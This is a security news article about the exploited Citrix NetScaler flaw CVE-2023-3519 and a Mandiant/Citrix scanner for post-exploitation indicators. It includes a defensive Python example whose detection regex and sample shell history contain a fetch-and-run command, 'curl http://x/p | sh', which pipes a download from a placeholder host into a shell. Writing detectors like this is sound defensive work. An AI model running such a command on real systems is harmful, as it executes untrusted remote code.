A zero-day vulnerability was previously discovered in Citrix NetScaler Application Delivery Controller (ADC) that allowed threat actors to perform remote code execution.
The zero-day was found to be exploited in the wild and was assigned CVE-2023-3519 with a severity score of 9.8 (Critical).
Citrix released patches to fix the vulnerability, but there was no way to determine whether a Citrix appliance had already been compromised.
According to a recent report by Fox-IT, part of NCC Group, over 1900 NetScalers are still infected with a backdoor.
Following further analysis, researchers have released a tool on GitHub that can scan Citrix appliances for evidence of post-exploitation activity related to CVE-2023-3519.
The tool incorporates multiple indicators of compromise (IOCs) found during the zero-day investigations.
Citrix IOC Scanner CVE-2023-3519
Mandiant released this tool to help organizations identify appliances that threat actors have already compromised.
Mandiant recommends that organizations use the tool to scan all vulnerable appliances that are connected to the internet.
The tool is designed to scan either a live appliance or a mounted forensic image.
The Citrix IOC scanner analyzes log sources and system forensic artifacts to identify any evidence pointing to exploitation of CVE-2023-3519.
If any evidence is found, organizations are advised to perform a forensic investigation of the affected system to determine the scope and extent of the security incident.
The tool's checks include scanning:
- File system paths that could indicate malware
- Shell history for suspicious commands
- NetScaler directories and files that match known IOCs
- Suspicious file permissions or ownership
- Crontab entries
- Malicious processes running on the system
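As an added example (not Mandiant's scanner code), the following Python sweep over a mounted image root implements three of the listed check categories: path IOC matching, shell-history review and permission checks. Every indicator path and command pattern in it is a constructed placeholder, not a real CVE-2023-3519 IOC, and the sample image it builds is constructed for the demonstration.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Constructed placeholders for illustration only; not real CVE-2023-3519 IOCs.
IOC_PATHS = {"var/www/evil.php"}
SUSPICIOUS_CMDS = [re.compile(p) for p in (r"\bcurl\b.*\|\s*sh\b",
                                           r"\bchmod\s+[ug]\+s\b")]
WEB_ROOT = Path("var") / "www"  # hypothetical web root inside the image


def scan_image(root):
    """Return (category, detail) findings for a mounted image rooted at `root`."""
    root = Path(root)
    findings = []
    # 1. Known malicious file paths present in the image.
    for rel in sorted(IOC_PATHS):
        if (root / rel).exists():
            findings.append(("ioc_path", rel))
    # 2. Shell history files containing suspicious commands.
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith("_history"):
                text = (Path(dirpath) / name).read_text(errors="replace")
                for line in text.splitlines():
                    if any(p.search(line) for p in SUSPICIOUS_CMDS):
                        findings.append(("shell_history", line.strip()))
    # 3. Setuid/setgid or world-writable files under the web root.
    for p in (root / WEB_ROOT).rglob("*"):
        if p.is_file():
            mode = p.stat().st_mode
            if mode & (stat.S_ISUID | stat.S_ISGID | stat.S_IWOTH):
                findings.append(("permissions", str(p.relative_to(root))))
    return findings


def build_sample_image():
    """Construct a throwaway directory tree that mimics a mounted image."""
    root = Path(tempfile.mkdtemp())
    (root / WEB_ROOT).mkdir(parents=True)
    shell = root / "var/www/evil.php"
    shell.write_text("<?php /* constructed placeholder */ ?>")
    shell.chmod(0o4666)  # setuid + world-writable: both flagged by check 3
    (root / "root").mkdir()
    (root / "root/.bash_history").write_text("ls\ncurl http://x/p | sh\nexit\n")
    return root


if __name__ == "__main__":
    for category, detail in scan_image(build_sample_image()):
        print(f"{category}: {detail}")
```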
The tool was developed jointly by Citrix and Mandiant, with the sole aim of helping organizations prevent compromise and scan for compromised systems.
Mandiant also notes that the tool will not be 100% accurate, since many files on the system may have been truncated or rolled over, or the system may have been rebooted.
In some cases, attackers may also have tampered with evidence on the system or masked the compromise with rootkits.
Hence, organizations are advised to examine their appliances thoroughly even after running the Citrix IOC scanner.